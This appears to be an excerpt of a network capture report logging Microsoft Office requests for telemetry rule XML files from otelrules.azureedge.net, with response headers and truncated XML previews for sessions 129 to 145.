                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:51:04 UTC  494                IN         HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:51:04 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1405
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                        ETag: "0x8DC582BE12B5C71"
                                                                                        x-ms-request-id: c77b1400-401e-0048-71d2-450409000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215104Z-1746fd949bdjzh7thC1EWR3g6400000003a000000000hqwb
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:51:04 UTC  1405               IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                        129         192.168.2.5  49937        13.107.246.63   443
                                                                                        Timestamp                Bytes transferred  Direction  Data
                                                                                        2024-12-05 21:51:01 UTC  192                OUT        GET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:51:01 UTC  494                IN         HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:51:01 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1368
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                        ETag: "0x8DC582BDDC22447"
                                                                                        x-ms-request-id: 4edcd523-801e-0047-60d3-457265000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215101Z-1746fd949bd9x4mhhC1EWRb76n000000037g00000000w1eh
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:51:01 UTC  1368               IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                        130         192.168.2.5  49938        13.107.246.63   443
                                                                                        Timestamp                Bytes transferred  Direction  Data
                                                                                        2024-12-05 21:51:01 UTC  192                OUT        GET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:51:01 UTC  494                IN         HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:51:01 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1401
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                        ETag: "0x8DC582BE055B528"
                                                                                        x-ms-request-id: 44bf79b1-501e-0078-809b-4606cf000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215101Z-1746fd949bd9x4mhhC1EWRb76n00000003b000000000dfc6
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:51:01 UTC  1401               IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                        131         192.168.2.5  49939        13.107.246.63   443
                                                                                        Timestamp                Bytes transferred  Direction  Data
                                                                                        2024-12-05 21:51:01 UTC  192                OUT        GET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:51:02 UTC  494                IN         HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:51:01 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1364
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                        ETag: "0x8DC582BE1223606"
                                                                                        x-ms-request-id: 4ddf438b-c01e-0049-57cd-45ac27000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215101Z-1746fd949bdkw94lhC1EWRxuz400000003h0000000003qxy
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:51:02 UTC  1364               IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                        Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                        132         192.168.2.5  49942        13.107.246.63   443
                                                                                        Timestamp                Bytes transferred  Direction  Data
                                                                                        2024-12-05 21:51:03 UTC  192                OUT        GET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:51:03 UTC  494                IN         HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:51:03 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1360
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                        ETag: "0x8DC582BDDEB5124"
                                                                                        x-ms-request-id: a14128ec-001e-005a-6ec7-45c3d0000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215103Z-1746fd949bd77mkmhC1EWR5efc00000003mg000000007bzp
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:51:03 UTC  1360               IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        133 | 192.168.2.5 | 49943 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:51:03 UTC | 192 | OUT | GET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:51:03 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:51:03 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1403
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                        ETag: "0x8DC582BDCB4853F"
                                                                                        x-ms-request-id: ca94536e-f01e-003c-2599-468cf0000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215103Z-1746fd949bdkw94lhC1EWRxuz400000003b000000000y8p1
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:51:03 UTC | 1403 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        134 | 192.168.2.5 | 49944 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:51:03 UTC | 192 | OUT | GET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:51:04 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:51:04 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1366
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                        ETag: "0x8DC582BDB779FC3"
                                                                                        x-ms-request-id: f7184125-501e-0064-68d4-451f54000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215104Z-1746fd949bd77mkmhC1EWR5efc00000003hg00000000gf37
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:51:04 UTC | 1366 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        135 | 192.168.2.5 | 49941 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:51:04 UTC | 192 | OUT | GET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:51:04 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:51:04 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1397
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                        ETag: "0x8DC582BE7262739"
                                                                                        x-ms-request-id: c8e56ad6-f01e-005d-13cc-4513ba000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215104Z-1746fd949bdlnsqphC1EWRurw0000000033g00000000kse6
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:51:04 UTC | 1397 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        136 | 192.168.2.5 | 49946 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:51:05 UTC | 192 | OUT | GET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:51:06 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:51:05 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1397
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                        ETag: "0x8DC582BDFD43C07"
                                                                                        x-ms-request-id: 8863b02e-001e-008d-5ccb-45d91e000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215105Z-1746fd949bdb8xvchC1EWRmbd4000000037g00000000emvp
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:51:06 UTC | 1397 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        137 | 192.168.2.5 | 49947 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:51:05 UTC | 192 | OUT | GET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:51:06 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:51:05 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1360
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                        ETag: "0x8DC582BDD74D2EC"
                                                                                        x-ms-request-id: 0cb9a159-001e-0079-71ce-4512e8000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215105Z-1746fd949bd4w8sthC1EWR7004000000031g00000000e8z1
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:51:06 UTC | 1360 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        138 | 192.168.2.5 | 49948 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:51:05 UTC | 192 | OUT | GET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:51:06 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:51:06 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1427
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                        ETag: "0x8DC582BE56F6873"
                                                                                        x-ms-request-id: 626f3694-401e-0015-30d1-450e8d000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215106Z-1746fd949bdfg4slhC1EWR34t00000000380000000002c04
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:51:06 UTC | 1427 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        139 | 192.168.2.5 | 49949 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:51:06 UTC | 192 | OUT | GET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:51:06 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:51:06 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1390
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                        ETag: "0x8DC582BE3002601"
                                                                                        x-ms-request-id: d954f12c-201e-000c-55cb-4579c4000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215106Z-1746fd949bd54zxghC1EWRzre400000003n0000000005t21
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:51:06 UTC | 1390 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        140 | 192.168.2.5 | 49950 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:51:06 UTC | 192 | OUT | GET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:51:07 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:51:07 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1401
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                        ETag: "0x8DC582BE2A9D541"
                                                                                        x-ms-request-id: 4f685411-201e-0033-27cc-45b167000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215107Z-1746fd949bd7wvgbhC1EWR0rgs00000003b000000000ey8g
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:51:07 UTC | 1401 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        141 | 192.168.2.5 | 49954 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:51:08 UTC | 192 | OUT | GET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:51:08 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:51:08 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1403
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                        ETag: "0x8DC582BDCDD6400"
                                                                                        x-ms-request-id: daf0ea0f-401e-005b-1ad4-459c0c000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215108Z-1746fd949bd2cq7chC1EWRnx9g00000002v000000000umf1
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:51:08 UTC | 1403 | IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        142 | 192.168.2.5 | 49951 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:51:08 UTC | 192 | OUT | GET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:51:08 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:51:08 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1364
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                        ETag: "0x8DC582BEB6AD293"
                                                                                        x-ms-request-id: 0db49ca6-a01e-001e-68d9-4549ef000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215108Z-1746fd949bddtfvqhC1EWRxbpg0000000330000000012903
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:51:08 UTC | 1364 | IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        143 | 192.168.2.5 | 49952 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:51:08 UTC | 192 | OUT | GET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:51:08 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:51:08 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1391
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                        ETag: "0x8DC582BDF58DC7E"
                                                                                        x-ms-request-id: e8edde3b-801e-0083-79cc-45f0ae000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215108Z-1746fd949bd4w8sthC1EWR700400000002zg00000000rh7p
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:51:08 UTC | 1391 | IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        144 | 192.168.2.5 | 49953 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:51:08 UTC | 192 | OUT | GET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:51:08 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:51:08 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1354
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                        ETag: "0x8DC582BE0662D7C"
                                                                                        x-ms-request-id: 8dafbd59-c01e-0034-0bce-452af6000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215108Z-1746fd949bdl6zq5hC1EWRf3ws00000002w000000000v8dn
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:51:08 UTC | 1354 | IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        145 | 192.168.2.5 | 49955 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:51:09 UTC | 192 | OUT | GET /rules/rule703350v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:51:09 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:51:09 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1366
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                        ETag: "0x8DC582BDF1E2608"
                                                                                        x-ms-request-id: 77d68196-001e-0066-56cc-45561e000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215109Z-1746fd949bdxk6n6hC1EWRdr8c000000032g00000000q0g6
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:51:09 UTC | 1366 | IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


